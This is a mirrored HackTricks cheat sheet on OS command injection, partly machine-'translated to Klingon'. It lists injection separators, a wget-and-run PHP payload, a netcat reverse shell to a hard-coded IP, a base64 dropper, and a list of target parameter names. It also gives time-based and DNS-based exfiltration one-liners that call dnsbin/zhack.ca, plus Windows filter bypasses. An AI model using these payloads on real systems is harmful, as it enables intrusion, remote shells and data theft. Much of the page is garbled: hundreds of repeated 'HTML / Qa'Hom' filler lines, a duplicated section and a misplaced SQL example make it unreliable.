Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-21 20:23:18 +00:00

Translator workflow b442ae90c4 Translated to Klingon

2024-02-10 17:52:19 +00:00

20 KiB

Raw Permalink Blame History

Command Injection

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

What is command Injection?

A command injection permits the execution of arbitrary operating system commands by an attacker on the server hosting an application. As a result, the application and all its data can be fully compromised. The execution of these commands typically allows the attacker to gain unauthorized access or control over the application's environment and underlying system.

Context

Depending on where your input is being injected you may need to terminate the quoted context (using " or ') before the commands.

Command Injection/Execution

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

QaD Bypasses

If you are trying to execute arbitrary commands inside a linux machine you will be interested to read about this Bypasses:

{% content-ref url="../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md" %} bypass-bash-restrictions.md {% endcontent-ref %}

ghItlh

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

Parameters

Qa'Hom

ngoD 25 parameters 'ej vItlhutlhlaH code injection 'ej similar RCE vulnerabilities (from link):

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

HTML

Qa'Hom

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Time based data exfiltration

Extracting data: char by char

Description

Time-based data exfiltration is a technique used to extract data from a target system by sending requests that cause delays in the response time. This can be useful in scenarios where direct data leakage is not possible, but an attacker can still exploit vulnerabilities to extract information.

One approach to time-based data exfiltration is extracting data character by character. This involves sending requests that extract one character at a time from the target system's database or file system. By carefully crafting the requests and measuring the response time, an attacker can reconstruct the desired data.

Methodology

Identify the injection point: Find a vulnerable parameter where command injection is possible. This could be in a web application's input field, URL parameter, or any other user-controllable input.
Determine the character set: Understand the character set used by the target system's database or file system. This could be ASCII, Unicode, or any other encoding scheme.
Extract one character at a time: Craft a payload that extracts one character at a time from the target system. For example, in SQL injection, you can use the SUBSTRING() function to extract a specific character at a given position.
Measure the response time: Send the crafted payload and measure the response time. If the response time is significantly longer for a specific character, it indicates that the character is present in the target system.
Repeat the process: Iterate through all possible characters in the character set and extract the entire data by combining the characters that are present in the target system.

Example

Let's consider a web application that takes user input and performs a command execution without proper input validation. The vulnerable parameter is the username field, which is susceptible to command injection.

The attacker can craft a payload like the following to extract the username character by character:

' UNION SELECT CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 1),1,1)='a') THEN pg_sleep(10) ELSE pg_sleep(0) END --

By measuring the response time, the attacker can determine if the first character of the username is 'a'. By repeating this process for all possible characters, the attacker can extract the entire username.

Mitigation

To prevent time-based data exfiltration, it is important to implement proper input validation and sanitization techniques. Here are some mitigation measures:

Use parameterized queries or prepared statements to prevent SQL injection attacks.
Validate and sanitize user input to prevent command injection.
Implement rate limiting or request throttling to detect and block suspicious requests.
Regularly update and patch software to fix known vulnerabilities.
Implement a web application firewall (WAF) to detect and block malicious requests.

By following these best practices, you can significantly reduce the risk of time-based data exfiltration attacks.

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

DNS based data exfiltration

Based on the tool from https://github.com/HoLyVieR/dnsbin also hosted at dnsbin.zhack.ca

DNS based data exfiltration

Based on the tool from https://github.com/HoLyVieR/dnsbin also hosted at dnsbin.zhack.ca

1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done

$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

DNS vItlhutlh

dnsbin.zhack.ca
pingb.in

Filtering bypass

Windows

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc

Linux

{% content-ref url="../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md" %} bypass-bash-restrictions.md {% endcontent-ref %}

Brute-Force Detection List

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt" %}

References

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

20 KiB Raw Permalink Blame History

Command Injection

What is command Injection?

Context

Command Injection/Execution

QaD Bypasses

ghItlh

Parameters

Time based data exfiltration

Description

Methodology

Example

Mitigation

DNS based data exfiltration

DNS based data exfiltration

DNS vItlhutlh

Filtering bypass

Windows

Linux

Brute-Force Detection List

References

20 KiB

Raw Permalink Blame History